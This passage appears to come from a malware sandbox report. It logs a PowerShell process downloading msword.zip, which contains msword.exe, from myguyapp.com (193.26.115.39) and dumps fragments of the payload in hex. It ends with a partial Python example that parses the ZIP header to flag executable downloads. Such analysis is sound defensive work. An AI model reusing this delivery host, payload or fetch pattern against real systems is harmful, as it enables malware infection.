Data Ascii: rd S$<)Ho_X[/S{J^^a#&`VTiGLSX/Go-];~tC0l5a:_;G4t~@haM o>y'TMPI+R3c3*jsKyNCg9FVHS7Rw
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 5e a2 6a 24 f5 91 8e b7 27 79 c8 7d ea d2 b1 25 7c ee 57 ec c9 15 dd a9 30 15 b5 d3 34 83 a2 76 8e 63 1f 59 1c bc f9 10 30 d0 d4 ba c9 24 3c 8f ac cc f2 6a 0c 1e 08 8d 60 af da 3a 1c 24 37 86 f0 4d 5c 80 63 e7 b3 eb cf 66 37 32 89 f1 7e 7a cd fd 2b 50 21 8c e0 18 ec eb 30 53 f0 8c d4 d6 26 66 50 84 eb c7 8d fc 42 b9 97 de 25 ec 90 3e a2 46 e9 0b fc 65 e1 82 74 59 96 57 f3 3f 12 7e 28 ad 95 bb f8 6e a1 4b ea 96 77 f0 bb 64 89 7c 96 6a a2 37 a1 9f b0 74 4b c4 1d 81 36 63 aa 71 35 b3 1b ef 66 38 91 c1 b4 4c d1 2c a7 b0 88 13 24 99 e6 25 2b 1c 83 67 b9 43 02 cd 8c 4a 94 38 2a 23 7c 48 d1 2c a4 e6 da 52 75 ea 50 8f 1c cd 63 9e 0d 92 21 a9 90 c2 42 6d 78 0e 2a a4 28 32 db ab c6 e0 81 eb 4a 8b 92 28 48 23 f8 17 29 87 1d 62 0c cf 31 2c f9 20 c7 8b 82 28 09 e4 bd
Data Ascii: ^j$'y}%|W04vcY0$<j`:$7M\cf72~z+P!0S&fPB%>FetYW?~(nKwd|j7tK6cq5f8L,$%+gCJ8*#|H,RuPc!Bmx*(2J(H#)b1, (
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: a3 8e 7d eb a8 ab a3 ae 8e 7d eb d8 6f 0c af 63 a8 17 c3 fb 89 61 7f 49 9c a7 e3 7d e9 b8 af 3a de 87 de 98 87 eb 93 d8 4f 12 fb 49 26 76 7d 58 2e 94 ec 49 3b 5f 6a 3c 6b 5b 21 23 de 05 32 99 9d 94 6f f1 dd 90 9a 11 4f ad 49 71 c2 b7 a3 17 9c 62 b1 50 7c b1 31 f1 91 5c e0 09 39 2c b4 3f a9 8a 15 ff 60 71 b6 32 e5 64 db e4 6f a0 37 de 13 9d 99 16 8f 46 f9 da ca 15 2e b6 42 9b a6 15 85 83 40 69 c2 2e 65 5b e4 37 95 f7 58 d1 5c 76 a2 24 ce ee ce 6e b9 b0 27 cd a3 27 ed 52 b9 38 75 70 78 f6 42 ae 30 a9 5c b2 8b 85 68 4c ec 9c b4 92 2c 4e 43 92 b7 95 c4 6b 05 32 4a be 50 2e 7a 03 a7 e2 cd 99 71 2e c2 9c 19 d1 fd 14 8c 6c f9 0f 01 26 4d 39 9e 90 2a fc 2c cb d0 a2 f2 a4 fa 91 33 5e 12 ff fd e4 19 f5 bc 33 6b 17 ce ef f5 aa bd 9b ab 53 8e 5d 9e c2 a5 c9 cd c5 92
Data Ascii: }}ocaI}:OI&v}X.I;_j<k[!#2oOIqbP|1\9,?`q2do7F.B@i.e[7X\v$n''R8upxB0\hL,NCk2JP.zq.l&M9*,3^3kS]
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: de 84 4f 26 a9 ed 13 86 69 72 d8 97 e0 14 74 90 fd 86 c5 c8 8f 26 38 05 3d 3d 95 0c 7b 54 5e 83 27 12 9c 02 9f 27 cf b0 57 df 19 92 9e e0 14 74 f7 cc 31 9c 64 e4 75 12 9c 82 2e 9e f5 86 93 55 5e 4d 9a 27 d8 f5 73 d8 70 8a 1b cb 5b a6 9f ea c6 92 ce 86 d3 8c fe 60 c3 19 ca 55 e5 52 93 7b 65 37 4f 09 18 6e 62 e4 6e dc 24 a4 9b b8 d7 68 8e f4 7a 74 05 99 6c 64 d8 6b 56 f6 b8 e1 24 e5 74 76 34 9c ac 9c 8c 37 0d bb a7 9c 8a 62 c3 a9 ca 95 39 d0 70 9a 91 4f 36 5c 49 b9 3a de 36 5c d9 c8 1d c3 19 ae 1f 8e 36 9c e9 3e 2d 1c 6f b8 aa d1 2f cb a7 9a d1 8f 1b ae 6e e2 de 69 b8 86 e1 a5 86 6b 1a fe dc 70 2d a3 ff 95 e1 da ee 5a f0 a2 e1 ba 26 ff 05 86 eb b9 79 e2 2f c3 f5 5d 7d b6 35 dc c0 f0 32 c3 8d 4c 6e 29 86 1b 1b ce 30 dc c4 f8 a9 61 b8 a9 e1 42 c3 cd cc da 6f
Data Ascii: O&irt&8=={T^''Wt1du.U^M'sp[`UR{e7Onbn$hztldkV$tv47b9pO6\I:6\6>-o/nikp-Z&y/]}52Ln)0aBo
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: f0 12 04 5e 08 f8 50 43 3c e4 4e 89 78 e5 5a cf f0 82 bd 8e 32 aa 8c d9 8b 0c 68 ca b5 c9 cf 08 77 e3 7f 28 af fa d8 b6 ae 2a 7e df 7b 8e 9d 0f c7 df 1f 75 be 13 c7 76 12 27 76 fc 91 c6 69 9c 4f a7 ad 93 28 4e 93 ad 49 db 01 55 97 aa 28 9a 2a 31 21 b4 b5 f0 17 d0 0e b1 ad 44 da 34 09 50 41 4c da 86 d0 90 26 15 a6 8e 0e 21 3a 54 01 da 1f 5d d4 49 83 d1 22 51 09 ba 7f 26 84 ba 16 06 b5 f9 9d fb ee b3 5f ec b8 49 5b 9d 9c e7 f3 ee bb f7 9e 73 7e e7 dc df 8d aa 67 49 50 c5 36 21 be 18 17 d1 54 4b 61 f0 91 c1 a7 76 59 dc 1b 04 1f f4 17 fd f7 d9 a8 6f eb fd 37 6d 8f 01 93 f4 1b 77 ef 78 4f cf 58 b8 c9 e0 09 4f 87 47 1f b7 64 1a ba f7 ce 71 14 74 8e 1d 49 3d 75 56 92 42 c1 4c ac b5 2d 3e 1d 88 f7 cd 0f 77 8e 8f 04 26 a2 4d 7d b3 6b 23 23 27 e7 c3 2f bd a0 72 3f
Data Ascii: ^PC<NxZ2hw(*~{uv'viO(NIU(*1!D4PAL&!:T]I"Q&_I[s~gIP6!TKavYo7mwxOXOGdqtI=uVBL->w&M}k##'/r?
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 28 34 32 3a 3e 71 d5 d6 f4 53 ff bd 5a cf ba 7d 07 26 a1 b3 13 42 1e 5a ae 26 df be c1 23 9f 9e 36 ff 0f 1f ec 3f 7e a1 e4 36 c7 a7 6f 3d 3a bb 3e 0c 65 fe 95 bb 16 1d 49 16 86 47 fb 0e 19 1d 9b a4 1c ce 2f 67 bd 41 4b e6 a1 f3 12 42 48 93 47 7a 0e 8a 9c 94 b8 7e ff 99 e2 06 0e 4f df 47 e8 b8 3a 71 88 f5 30 65 be e8 48 b2 31 05 8c 9c ba f2 40 01 eb 21 7e 60 35 3a 26 21 84 7c 9f 9b df d0 09 49 7f cf f9 4a db a7 ef 33 77 74 4e 7d 98 c1 7c 99 99 e8 48 72 f2 0e 9b fe 8f 4b cc c7 68 b6 13 1d 90 10 42 ee e7 39 f8 17 7f c9 d7 f0 e9 fb c2 07 9d 50 1f ba 96 b1 5e 26 d3 88 ce 24 ad ee 93 0f b3 5e a3 79 16 03 3a 1d 21 84 b4 a8 63 94 72 53 ab a7 af a6 37 3a 9d 4e 6c 60 bd 4c 7d 04 3a 92 c4 0c 31 36 d6 7b 7c a3 d0 1d 9d 8d 10 42 5a 13 96 a1 d1 d3 67 7f 02 1d 4d 27 c2
Data Ascii: (42:>qSZ}&BZ&#6?~6o=:>eIG/gAKBHGz~OG:q0eH1@!~`5:&!|IJ3wtN}|HrKhB9P^&$^y:!crS7:Nl`L}:16{|BZgM'
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 5e 34 2b fd 19 77 30 6d 2d 6f 49 d3 88 29 b8 15 4c c1 ad a0 26 43 56 2f b5 75 ba cc 1d 5b 57 9f 74 e3 e8 cb 94 e0 87 f8 07 58 1e 4d b3 53 ff fd dc c9 b4 95 d9 8b a6 12 33 70 2b 98 82 5b 41 4d 86 ac 5e ee b0 84 3b b6 b6 2e 8e 61 29 cc 84 89 dc 2b e2 b4 94 68 a9 23 b9 83 e9 eb b2 b4 3f 3d f7 85 5b c1 14 dc 0a 6a 32 64 f5 72 87 0e 17 b8 73 eb 6b 9e 2f 4b 65 8d e5 9d c1 bd 20 4e e7 82 88 d6 fa 0f ee 64 fa aa fc ad 27 51 29 8d 85 5b c1 14 dc 0a 6a 32 64 f5 72 a7 e9 dc b9 35 b6 b9 35 4f 67 8d 13 5f c1 bd 1f 56 c9 44 6b 8d 2a e2 4e a6 31 23 80 a8 95 46 c2 ad 60 0a 6e 05 35 19 b2 7a b9 53 40 0e 77 70 8d ed eb c4 53 5a a3 ac e4 de 0e af 4c 6f a2 bd ce e5 4e a6 b3 7f f2 1e 0b b8 15 4c c1 ad a0 26 43 56 2f 77 f9 de c3 fd ef a7 35 a7 7b 33 b5 d6 b0 d0 4b dc cb e1 55
Data Ascii: ^4+w0m-oI)L&CV/u[WtXMS3p+[AM^;.a)+h#?=[j2drsk/Ke Nd'Q)[j2dr55Og_VDk*N1#F`n5zS@wpSZLoNL&CV/w5{3KU
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 0b 1b d6 19 55 e7 74 6c c9 71 49 89 c3 12 6a 24 da 69 aa 34 d6 b4 d6 f9 d5 15 53 34 4c c4 c6 13 13 84 c4 e5 31 30 e5 62 71 7f 83 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 69 2e c0 5f 3e dd 8b ef bf ea 79 85 65 b4 6f ce 3e cb f8 13 fa da d1 3c 6d af ee ed a7 ef cf eb 3a 1d c2 6e d9 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 de cf df 3f 2d b7 ef 8f ea 09 64 9b b7 9f ce 42 d7 f8 0b fa c6 cd 43 6d 4f ee 95 9f ef ff 00 eb 4a dd 3a 61 1a e0 00 00 00 00 00 00 00 00 00 34 97 60 2f 9f 6e c7 f7 db f5 3c c2 b2 da 37 e7 1f 65 fc 0b fd 6d 68 9d f6 d7 f7 76 d3 f7 e7 f5 95 0e e1 37 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 73 67 ff 00 9f 96 db f7 c7 f5
Data Ascii: UtlqIj$i4S4L10bqi._>yeo><m:n f?-dBCmOJ:a4`/n<7emhv7l3sg


Session ID: 2
Source: 192.168.2.4:49738
Destination: 193.26.115.39:443
PID: 7420
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2025-01-07 17:13:04 UTC   Bytes transferred: 167   Direction: OUT
GET /msword.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: myguyapp.com
Connection: Keep-Alive

Timestamp: 2025-01-07 17:13:04 UTC   Bytes transferred: 285   Direction: IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 17:13:04 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 07 Jan 2025 15:01:14 GMT
ETag: "13bf90-62b1f043130f4"
Accept-Ranges: bytes
Content-Length: 1294224
Connection: close
Content-Type: application/zip
                                                                  2025-01-07 17:13:04 UTC7907INData Raw: 50 4b 03 04 14 00 00 00 08 00 f2 25 27 5a 24 96 56 05 1a bf 13 00 0f 46 14 00 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 16 81 92 73 f8 d1 12 4d 38 49 65 3d ac b5 d6 de 6a 6b 6f 4d b1 ad 6d 6d a5 ad 95 a8 88 09 20 09 4a 2d 0a c5 b4 e0 35 22 d5 59 37 ea 2a 31 2c 10 39 9f f7 33 b3 1b 02 d7 b6 f7 f3 79 dd ef 7f df e0 ec 99 33 e7 99 99 67 9e 79 7e ce cc 39 fa 6f 7f 58 b2 49 92 64 47 32 4d 49 6a 91 c4 9f 4f fa f7 7f fb 91 86 5c fa e2 10 e9 b9 c1 7f be ac c5 32 fb cf 97 dd a6 2c ab 2d 5e b5 7a e5 3d ab ef bc b7 f8 ee 3b 57 ac 58 a9 16 df b5 b4 78 b5 b6 a2 78 d9 8a e2 f2 5b 82 c5 f7 ae 5c b2 74 62 5e 5e 4e 49 ba 8d e9 df 7e f3 1b 59 17
                                                                  Data Ascii: PK%'Z$VFmsword.exe|T?~GlE4BP.(qAf*sM8Ie=jkoMmm J-5"Y7*1,93y3gy~9oXIdG2MIjO\2,-^z=;WXxx[\tb^^NI~Y
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: c2 ec e9 51 84 5e e2 42 8c b3 88 8f f3 7b 5f 66 b0 1f a4 7f 62 f5 9e a8 fd 07 4d 33 29 2a ef 89 d5 2b 78 bc 4d 8e 3a fb 70 3c 5f 31 bf 3a 8d f0 dd 63 68 f3 99 1f 17 99 87 2c 58 c2 ad e7 3d 43 6a 90 7d e3 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 c7 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 53 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 50 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 5a 42 67 31 88 c3 1c ab 70 fb 3c 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 f8 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 93 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec 3f 30 51 de 57 d5 dc b4 24 11 09 6a cc 2c ea f0 16 ed f1 aa 20 fb 29 aa c5 cf 80 39 ca 26 d0 2a a6 fa ed 88 8d 5d 0a ce 8e d8 8d 4e 36
                                                                  Data Ascii: Q^B{_fbM3)*+xM:p<_1:ch,X=Cj}-wbYT(W-mq<fS46h4(c0+PrRj&Zn%W$NZBg1p<n#-Csk1)axqARfU!vTT+j?0QW$j, )9&*]N6
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 3f d4 f2 38 a0 5a 6d 04 eb be 0e 21 e9 a1 60 47 1e a4 2f 6f 8e 71 79 fb 89 d6 7e bf d1 dc fe f2 58 94 58 db a8 be f8 15 8b 75 41 5e 5e a1 cd 91 f9 4a 14 eb 0d d9 cd f4 ad 48 1e cd d0 cb e5 83 e9 69 2c d2 b1 8b 23 ca af 5b fa df f6 36 92 76 a2 1b 46 f9 9f 38 ec de 7f a2 f3 fd 6b ff 25 76 ff 64 09 e9 1d 9d 41 52 21 8a 85 fb 7d e7 ef 9b 1b bd b1 cb 15 23 34 43 9f 8a 5d 98 89 ed 6d 85 be 13 a9 12 72 5c 1e ac ab 62 a4 34 a4 3c 59 38 7a a8 e5 0c 53 19 c1 2f 68 ae 79 b6 f4 e8 fc 72 59 fd 76 25 ff 1e f6 f8 7c 52 04 2f e9 ca c1 db 73 af 74 7d fc 1f c9 6d 6d 83 42 c5 34 80 a2 f1 a3 5a 1e 3f 76 d3 19 7c 76 76 f0 69 eb f3 60 b4 a3 ea cf 6f 6b 1f 05 d3 0d 89 a2 27 49 57 2e 3c 6c dd 8d cb 59 7e 9c ac 76 6c 0b d6 56 7b f4 fd 7a f9 52 77 b1 a6 fd 62 59 aa a4 b8 a0 b8 e7
                                                                  Data Ascii: ?8Zm!`G/oqy~XXuA^^JHi,#[6vF8k%vdAR!}#4C]mr\b4<Y8zS/hyrYv%|R/st}mmB4Z?v|vvi`ok'IW.<lY~vlV{zRwbY
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 16 e2 7e b2 2d a0 05 6e 8e b9 01 97 9d 55 09 8d 8a 1f 66 ea b9 06 36 9d 3e 86 2a 6f db 64 55 5c aa 6d 21 70 cd c9 fb 72 40 30 c3 b5 c8 b1 fd 8f 02 5b a3 7b 70 1d f2 b8 8a ec c9 39 0c 41 dd 2d f6 c9 83 b0 e6 e3 1b 4e 8b e8 3f ca a0 c7 e1 30 73 ec 65 47 eb df d2 16 a9 60 71 df ee c8 c8 e7 a0 f8 b4 79 c8 b3 33 fc 62 de c1 af c3 f0 56 b2 c2 de 7e 6e a8 c0 4d 9c 60 16 47 f8 f1 b7 f4 41 0e 0d fa 8f f1 f1 51 7b 13 0e e1 5d 74 6f e0 d0 f3 c4 7c ff 26 41 28 6a 7b a4 c8 bd 8b c2 6b 52 7d e8 28 74 dc 7e ca 94 13 d6 17 f3 cf f6 ef 09 e1 65 fa 72 d9 6b 88 47 eb 39 2a 65 df 2c 9c 1c d3 9a fb e5 bf b4 7e cd 9c 10 22 35 71 43 85 5a d2 e4 e3 5b b2 74 34 08 04 6c a6 92 fd de 00 0b 21 db 31 48 cb bc 74 e0 90 2c 93 96 c4 54 8c 29 ec 34 74 e8 96 9a 84 7e 74 07 d6 cf ec 19 42
                                                                  Data Ascii: ~-nUf6>*odU\m!pr@0[{p9A-N?0seG`qy3bV~nM`GAQ{]to|&A(j{kR}(t~erkG9*e,~"5qCZ[t4l!1Ht,T)4t~tB
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: f1 2e 8c 0d 82 3e 51 6b 3f 7d 0a bf 96 df 18 79 50 77 0c 55 c3 73 92 7b 42 7a 2d a2 6d fa 79 56 5c c9 a7 c6 de 52 51 bd da b9 b1 d2 97 8a fc 2d 2d b2 1c 43 d7 42 59 93 35 63 bf f0 fe 8c 14 7b 69 a5 b1 8e b7 e9 c8 c8 e0 c7 24 e3 e4 be 77 e9 0e f7 f1 2f 74 21 4f 8d ed 5f b8 b3 99 81 73 ae cb 3f 7f f4 fd 82 b0 af dd 8f 1d 8e 1d a9 85 9a eb b7 39 ac 64 1e 90 0f 9e 90 7b f1 49 87 74 df bc c6 37 6c 95 83 85 94 9c cc 7a 7d be a9 94 f5 76 d3 96 df fc d0 79 26 bd 24 36 92 5c b5 e2 97 eb 8c bc 1c f3 5d 9d 44 66 92 f0 29 79 93 25 76 e5 24 a5 c6 fc d5 85 0f 06 6d b9 a8 8f b6 6f 9f be 94 e4 e6 7b 25 c6 6d 19 73 24 82 6f 8e c5 12 cb 4b 56 ad 4a b0 b9 7d 57 43 57 67 e9 f5 e7 c2 a2 53 8c bf 42 02 69 5a 45 31 ba fa 22 2a f1 71 b7 26 27 43 de bf e1 70 bc 42 37 fd ea e0 52
                                                                  Data Ascii: .>Qk?}yPwUs{Bz-myV\RQ--CBY5c{i$w/t!O_s?9d{It7lz}vy&$6\]Df)y%v$mo{%ms$oKVJ}WCWgSBiZE1"*q&'CpB7R
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 0c b8 8d 75 14 bd 50 7e 58 d6 dc 97 68 f7 f4 46 69 48 21 55 31 c7 d8 1f 42 e5 b5 c7 71 9d 8d f4 c6 ae d9 8d 36 aa ab 07 62 da a0 f0 24 95 e1 74 e0 c7 fc 90 f0 cd cf 5b f7 1e 32 aa 4c 1b eb 79 83 92 7b 17 41 77 3c 30 62 54 ed 59 11 ba e7 c8 27 e5 ac a1 e8 04 d9 2b ca 6a ef 78 41 71 ea e0 cf 5e 23 1c f5 d2 18 0e 2c ac 80 1e ca 20 fc e2 47 95 b0 1a c6 bf 2a f4 d5 8e 8a 8e a3 3b 28 19 a4 ae 7a 94 98 d2 cf 62 b3 2d 91 18 9a 3f 16 03 7a 83 60 46 bb d3 ab 1e 80 5b 86 d6 ef 0b c4 e3 2a f1 49 fd 50 8e 54 71 6f 00 89 d7 d9 b2 b5 ad f5 6f 7d 3d cd 8c dd 16 50 7a 1e 92 36 85 d3 0d 46 09 e6 68 88 20 d5 1c 7b 60 66 d5 f7 a8 1a f7 9b 5b 90 5f cb 5b 8f 19 b1 fa fa a8 4f aa 4c a9 ca 3e f4 d7 c9 2a 75 66 c7 fb e9 90 4a 24 54 7a db 4c 22 3c 6a fb b4 35 28 71 63 63 1c 7b 17
                                                                  Data Ascii: uP~XhFiH!U1Bq6b$t[2Ly{Aw<0bTY'+jxAq^#, G*;(zb-?z`F[*IPTqoo}=Pz6Fh {`f[_[OL>*ufJ$TzL"<j5(qcc{
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: c8 f1 b1 16 b6 04 a4 9e 4d 26 a1 a6 41 cc 6b 47 10 07 aa 89 28 4d ff 38 8e 7c e8 77 d3 4b 50 cf e0 20 d5 7a 2b 2c b9 9d 05 2b b3 9a 79 61 eb 9e fb 0e ef 33 c2 c3 9e a0 bb d8 ba 7c 6d db 22 1f f6 c8 3c 15 bc 9d ae 24 5c 02 92 5a 0f 1e 2d 74 52 b4 fd 1f 71 b8 db 44 89 31 a9 65 1d 0f b7 c7 88 d6 69 6b 96 91 8c c9 1a b1 9b b5 38 b2 1f 78 8c ad fe 61 45 5f d0 5b b8 9f 54 e6 4a 26 e8 b9 0d 0d 2b 61 11 44 07 a0 d9 02 fa 71 e4 21 1c b9 2a f0 a3 f3 f2 cd 71 48 df 2c 87 f6 cc 3e f9 4b 09 63 c3 66 d1 0b b2 27 fd 52 95 90 ff 5b 9f 24 eb b3 f7 22 3c 52 af 26 de 86 1f 3f 43 de 4e d5 cf 47 fe b3 f2 95 bd 4a a6 45 01 96 01 a3 9f 5c c5 9a cc f4 43 71 95 9e 0c 43 e3 db 41 b0 e7 ad d4 42 62 8a 16 43 a6 44 dd 17 71 1f 0a 37 22 fa 01 61 35 cb 70 ae 17 14 4b 3a fb fa 9f f1 ed
                                                                  Data Ascii: M&AkG(M8|wKP z+,+ya3|m"<$\Z-tRqD1eik8xaE_[TJ&+aDq!*qH,>Kcf'R[$"<R&?CNGJE\CqCABbCDq7"a5pK:
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: fc ba 41 17 27 71 f4 cc 50 ba 65 43 a0 ff f4 7a 06 9b ea 11 26 98 d9 5d c1 a5 5e c4 1f 46 6a af 21 3d 11 7b 15 05 55 cc bf 18 81 a0 85 6f a6 c8 5d 2b ae 35 5a 23 5b 0c 8a bc c1 6c 42 ce ba 26 89 94 bc 15 53 c2 d7 20 b2 ca b9 af 7a 8e d0 9a 2e 0f b2 67 f7 92 cb 67 72 f3 6a 02 6a 77 7b 0c df 29 1b a0 bd cb 6b 7f d3 0a 4d 9c d4 c9 7b 85 38 b4 95 f5 da 5c bf 83 48 2d 29 62 66 2d 7b 87 70 4d 89 f5 cf d7 15 e5 2c e7 87 05 f8 f4 d6 bf 80 f3 7e 61 60 ae 7b 55 68 8f d8 ae 43 eb 3f e7 68 c4 7a cb 50 61 19 18 90 25 8e 47 72 f4 78 10 2c 7d 94 28 95 0e 9b 65 db c9 eb 6b 11 31 1b 22 03 e0 20 a1 6b 16 a8 3b af bd 39 5f 42 0e 76 f4 3b 82 bc ec 65 66 d9 58 10 41 dc ff b3 35 50 44 6e 22 6f 74 ad 51 c2 bd 14 19 57 ec 49 e0 fc 9c 88 7f 50 cb 63 5f a3 53 8e 27 0b a3 3a 32 84
                                                                  Data Ascii: A'qPeCz&]^Fj!={Uo]+5Z#[lB&S z.ggrjjw{)kM{8\H-)bf-{pM,~a`{UhC?hzPa%Grx,}(ek1" k;9_Bv;efXA5PDn"otQWIPc_S':2
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 98 31 45 a7 17 35 46 86 c2 eb 5d 87 0c a0 ab 62 2f 77 24 07 ed 5e f5 23 bd 32 42 ae be df 26 49 23 ef 41 28 32 0b 80 59 4a 24 87 32 0b bc 81 2a 5e 7a 92 7c 02 27 f0 57 10 84 8c 04 65 18 d4 34 2c 99 da 67 b7 90 5e 83 0d 11 e9 dc 97 6b b5 da 43 7c 38 d5 cd 72 b2 b1 bd 62 22 bb 04 5b c5 a9 62 10 39 ef 69 ab 7d b1 49 47 58 8c e7 7f 0f 3a 02 52 30 6a 10 8e fa 36 3d 12 3b 1b 10 a1 fe 8e 1b 6f 58 f0 59 68 0a 8b b1 33 8f 4f 5f bd 5c f5 7c 88 55 8f 75 da 77 d2 8e 9d 03 f9 af 59 7d ff ca 52 5b cd 84 41 72 19 71 05 2a 63 db c1 9b f1 b3 64 f2 c7 18 75 4d f3 3a 1d d9 5a 34 8a af bc 79 da 4a d6 38 cb a7 eb c2 5c bd a8 1c b2 7a 47 1f 53 09 d2 b8 ae 81 0f db 5c ca 59 4f eb 1c 1f 91 33 e6 11 47 37 82 7e 04 b4 c3 36 03 c4 10 93 cb be bd 8a 89 2d 21 1e 00 ed c5 8a 45 e0 4f
                                                                  Data Ascii: 1E5F]b/w$^#2B&I#A(2YJ$2*^z|'We4,g^kC|8rb"[b9i}IGX:R0j6=;oXYh3O_\|UuwY}R[Arq*cduM:Z4yJ8\zGS\YO3G7~6-!EO
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: d9 05 a6 75 a8 5f f6 e4 fc 3a 3e 66 e7 6e ed cd 7e 08 7f 67 fc 69 38 95 a7 b3 c3 f6 10 10 9c 5c c4 53 df 65 c9 a7 7f 3d ff 56 1a 38 f0 43 f2 9a 49 21 fc b6 0e b5 fb 70 10 a0 0d 94 7a 73 cf a6 f9 1e b7 1a d4 60 8b 25 b6 84 c4 d1 46 dd 60 05 70 d0 22 d8 16 4f aa 86 ed 3a 79 cb 50 d7 7b c6 ac 42 e8 d9 1c b0 97 8a a8 b9 31 aa 55 4b 6b 02 0d 24 45 c2 4e e0 4c 2f b6 7b 33 20 db 91 13 74 e8 97 78 85 40 6a 79 ba ea 7f 35 16 15 68 d5 c9 55 c9 6d 5f de 2a 0a 3a 7b e5 08 d6 e8 8a 17 3c 57 9a 85 66 20 51 e9 00 40 4b 82 45 9e a0 d4 5c 8f 1c ff 1d a1 9e 03 1f a2 92 5d cf e3 7b d5 a3 f2 e2 27 9c 9b 3a 5e cd f7 84 d0 d3 f8 1c 54 a2 5e 1f 96 14 3c 50 5a f3 2d 13 da bb e6 92 61 af e5 f0 65 96 dd be 60 93 cb 58 05 d1 13 08 b2 cb 7c 9b 1f 41 eb c0 62 3e fe 38 77 bf ba 97 10
                                                                  Data Ascii: u_:>fn~gi8\Se=V8CI!pzs`%F`p"O:yP{B1UKk$ENL/{3 tx@jy5hUm_*:{<Wf Q@KE\]{':^T^<PZ-ae`X|Ab>8w
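The first "Data Raw" row of this session begins with 50 4b 03 04, the ZIP local file header signature, and the name that follows the 30-byte fixed header is msword.exe. The Python below is an added example, not part of the Joe Sandbox report, that parses that header from the captured bytes (transcribed inline from the row above), decodes the packer's DOS timestamp, and cross-checks the entry against the response headers and the size of the dropped msword.exe listed under Target ID 13. The finding strings, the executable-suffix list and the function names are the example's own, not anything the sandbox emits.

```python
import struct
from dataclasses import dataclass
from datetime import datetime

# Bytes 0..39 of the msword.zip response body, transcribed from the first
# "Data Raw" row of the session to 193.26.115.39:443, so the parser runs
# offline against the real capture.
CAPTURED_ZIP_PREFIX = bytes.fromhex(
    "504b0304140000000800f225275a249656051abf13000f4614000a000000"
    "6d73776f72642e657865"
)

# The matching HTTP response headers from the same session (constructed dict).
CAPTURED_RESPONSE_HEADERS = {
    "Content-Type": "application/zip",
    "Content-Length": "1294224",
}

# Size of msword.exe as dropped on disk, taken from the process list (Target ID 13).
DROPPED_MSWORD_EXE_SIZE = 1_328_655

LOCAL_FILE_HEADER_SIG = b"PK\x03\x04"
LOCAL_FILE_HEADER_FMT = "<4sHHHHHIIIHH"      # 30-byte fixed part, little-endian
FLAG_ENCRYPTED, FLAG_DATA_DESCRIPTOR, FLAG_UTF8 = 0x0001, 0x0008, 0x0800
# Suffix list chosen for this example; extend to taste.
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".pif", ".com", ".cmd", ".bat",
                       ".js", ".vbs", ".hta", ".ps1", ".lnk")


@dataclass
class LocalFileHeader:
    version_needed: int
    flags: int
    compression: int          # 0 = stored, 8 = deflate
    modified: datetime        # packer's local clock; ZIP stores no timezone
    crc32: int
    compressed_size: int
    uncompressed_size: int
    filename: str


def dos_datetime(dos_time: int, dos_date: int) -> datetime:
    """Decode the MS-DOS time/date pair used in ZIP headers (2-second resolution)."""
    return datetime(1980 + (dos_date >> 9), (dos_date >> 5) & 0x0F, dos_date & 0x1F,
                    dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2)


def parse_local_file_header(data: bytes) -> LocalFileHeader:
    """Parse the ZIP local file header (APPNOTE section 4.3.7) at the start of data."""
    if len(data) < 30:
        raise ValueError("need at least 30 bytes for a local file header")
    (sig, version, flags, compression, mtime, mdate, crc, csize, usize,
     name_len, _extra_len) = struct.unpack(LOCAL_FILE_HEADER_FMT, data[:30])
    if sig != LOCAL_FILE_HEADER_SIG:
        raise ValueError("not a ZIP local file header: %r" % sig)
    name = data[30:30 + name_len]
    if len(name) != name_len:
        raise ValueError("filename truncated")
    # Bit 11 selects UTF-8 names; otherwise the name is CP437 (the historical default).
    encoding = "utf-8" if flags & FLAG_UTF8 else "cp437"
    return LocalFileHeader(version, flags, compression, dos_datetime(mtime, mdate),
                           crc, csize, usize, name.decode(encoding, errors="replace"))


def assess_archive_download(headers: dict, body_prefix: bytes,
                            dropped_file_size: int = None) -> list:
    """Findings a proxy or EDR could raise from only the first bytes of an archive download."""
    findings = []
    try:
        hdr = parse_local_file_header(body_prefix)
    except ValueError as err:
        return ["not a ZIP local file header: %s" % err]
    if hdr.filename.lower().endswith(EXECUTABLE_SUFFIXES):
        findings.append("first entry is an executable: %s" % hdr.filename)
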